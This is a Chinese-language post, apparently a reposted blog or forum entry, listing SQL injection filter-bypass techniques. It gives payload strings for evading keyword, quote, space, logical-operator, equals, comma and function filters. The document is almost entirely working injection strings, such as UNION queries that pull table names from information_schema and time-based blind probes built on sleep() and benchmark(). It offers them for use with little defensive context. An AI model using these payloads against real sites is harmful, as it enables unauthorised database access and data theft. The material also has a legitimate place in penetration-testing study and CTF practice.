SQL注入绕过方法
SQL注入绕过方法目录
[*]SQL注入绕过方法
[*]一、绕过关键字
[*]二、绕过引号
[*]三、绕过空格
[*]四、绕过逻辑符号
[*]五、绕过等号
[*]六、绕过大小于等于号
[*]七、绕过逗号
[*]八、绕过函数
参考:
https://blog.csdn.net/zizizizizi_/article/details/124094197
http://wed.xjx100.cn/news/143416.html?action=onClick
一、绕过关键字
1、大小写绕过
举例:
-1' UniOn SelEct 1,2#2、双写绕过
举例:
-1' uniunionon seselectlect 1,2#3、URL编码绕过
举例:
?id=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%23
?id=-1'+union+select+1%2C2%23
url解码:
?id=-1' union select 1,2#4、内联注释绕过
举例:
-1' /*!union*/ /*!select*/ 1,2#二、绕过引号
1、16进制编码绕过
举例:
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761#2、URL编码绕过
举例:
?id=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%23
url解码:
?id=-1' union select 1,2#3、ASCII编码绕过
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=concat(CHAR(100),CHAR(118),CHAR(119),CHAR(97))#4、宽字节绕过
-1%df' union select 1,2--+三、绕过空格
1、注释符绕过
举例:
-1'/**/union/**/select/**/1,2#2、内联注释绕过
-1'/*!*/union/*!*/select/*!*/1,2#3、括号绕过
-1' union(select(1),(2))#4、tab键绕过
-1' union select 1,2#5、两个空格绕过
-1'unionselect1,2#四、绕过逻辑符号
1、and绕过
1' & 1=1#1' && 1=1#2、or绕过
1' || 1=1#3、not绕过
1' and 1!=2#五、绕过等号
原型
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#1、like绕过
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema like database()#2、rlike绕过
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema rlike database()#3、regexp绕过
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema regexp database()#4、大小于号绕过
-1' union select 1,group_concat(table_name) from information_schema.tables where !(table_schema<>database())#六、绕过大小于等于号
原型
1' and if(ascii(substr(database(),1,1))>100,sleep(2),0)#1、greatest、least绕过
greatest():
greatest(n1, n2, n3…):返回n中的最大值
1' and if(greatest(ascii(substr(database(),1,1)),100)=100,sleep(2),0)#least():
least(n1,n2,n3…):返回n中的最小值
1' and if(least(ascii(substr(database(),1,1)),100)=100,sleep(2),0)#2、strcmp绕过
strcmp():
strcmp(str1,str2):若所有的字符串均相同,则返回0,若根据当前分类次序,第一个参数小于第二个,则返回-1,其它情况返回1
1' and if(strcmp(ascii(substr(database(),1,1)),100)=0,sleep(2),0)#3、in关键字绕过
1' and if(ascii(substr(database(),1,1)) in (100),sleep(2),0)#
或
1' and if(substr(database(),1,1) in ("d"),sleep(2),0)#4、between...and..绕过
1' and if(ascii(substr(database(),1,1)) between 90 and 100,sleep(2),0)#5、like绕过
1' and if(substr(database(),1,1) like "d%",sleep(2),0)#七、绕过逗号
1、from pos for len,其中pos代表从pos个开始读取len长度的子串
1' and if(ascii(substr(database() from 1 for 1))=100,sleep(2),0)#2、join关键字绕过
-1' union select * from (select 1)a join (select 2)b#3、like关键字绕过
1' and if(database() like "%d%",sleep(2),0)#4、offset关键字
1' union select 1,2 limit 1 offset 0#
等价
1' union select 1,2 limit 0,1#八、绕过函数
1、绕过sleep()
(1)benchmark函数
benchmark():第一个参数代表执行次数,第二个参数代表执行表达式
1' and benchmark(1000000000,1)#2、绕过ascii()
(1)bin函数
bin():转换成二进制数
1' and if(bin(ascii(substr(database(),1,1)))=1100100,sleep(2),1)#(2)hex函数
hex():转换成十六进制数
1' and if(hex(substr(database(),1,1))=64,sleep(2),1)#(3)ord函数
ord():给定的字符串,其最左边的字符代码将被查找
1' and if(ord(substr(database(),1,1))=100,sleep(2),1)#3、绕过group_concat()
(1)concat_ws函数
concat_ws(分隔符,str1,str2):
-1' union select 1,concat_ws(",","@",table_name) from information_schema.tables where table_schema=database()#(2)concat函数
concat():
-1' union select 1,concat(table_name) from information_schema.tables where table_schema=database()#4、绕过substr()
(1)substring函数
substring(str,pos,len):
1' and if(substring(database(),1,1)="d",sleep(2),1)#(2)mid函数
mid(str,pos,len):
1' and if(mid(database(),1,1)="d",sleep(2),1)#(3)left函数
left(str,len):
1' and if(left(database(),1)="d",sleep(2),1)#(4)right函数
right(str,len):
1' and if(right(database(),1)="a",sleep(2),1)#
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]